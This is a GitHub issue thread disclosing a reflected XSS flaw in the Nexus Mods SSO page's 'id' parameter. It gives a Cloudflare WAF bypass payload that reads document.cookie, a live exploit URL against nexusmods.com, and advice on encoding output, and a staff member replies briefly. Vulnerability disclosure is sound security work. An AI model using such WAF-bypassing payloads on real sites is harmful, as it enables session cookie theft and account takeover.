### ISSUE TITLE
Reflected XSS Bypassing Cloudflare WAF - Steal Cookie + Account Takeover

### ISSUE THREAD

**Issue by KeepWannabe** [Nexus-Mods/web-issues#1438]
## Your username/username(s) affected

1. All of user who visit the link with the XSS payload

## Bug/error being reported:

1. This bug is called Reflected XSS (Cross-Site Scripting), its a javascript injection through Parameter.
2. CWE-79 (https://cwe.mitre.org/data/definitions/79.html)

## Steps to reproduce:

1. I want to install some mod and click the link to open the nexus mod via `nexus://` protocol
2. The NexusMod redirecting me to the Website and i see the parameter called `id`
3. So i try the simple XSS payload like

`"><img src=x onerror=alert(1)>`

but the Cloudflare WAF block my request. So i decided to bypass it using this payload

`"><svg%20onxxxxxxxxxxxx={}%20onload=alert(document.cookie)%20test="`

and its work perfectly. Live Mode : https://www.nexusmods.com/sso?id=%22%3E%3Csvg%20onxxxxxxxxxxxx={}%20onload=alert(document.cookie)%20test=%22&application=nexusmodmanager

## Expected result:

1. Its need patch ASAP
2. Maybe a little bounty for this bug ? XD

## Fixing Step
1. Never trust the user input
2. use `html_entities()` (if u using PHP) to encode the output, so the browser isn't execute the user input as a javascript.

**Comment by KeepWannabe** [comment]
i found the xss again on the other parameter, should i report here or make a new one ?

**Comment by KeepWannabe** [comment]
any reply about this issues ?

**Comment by KeepWannabe** [comment]
there's not patch for this ?

**Comment by Pickysaurus** [comment]
This information has been passed to our web team for review. Thanks for the feedback.
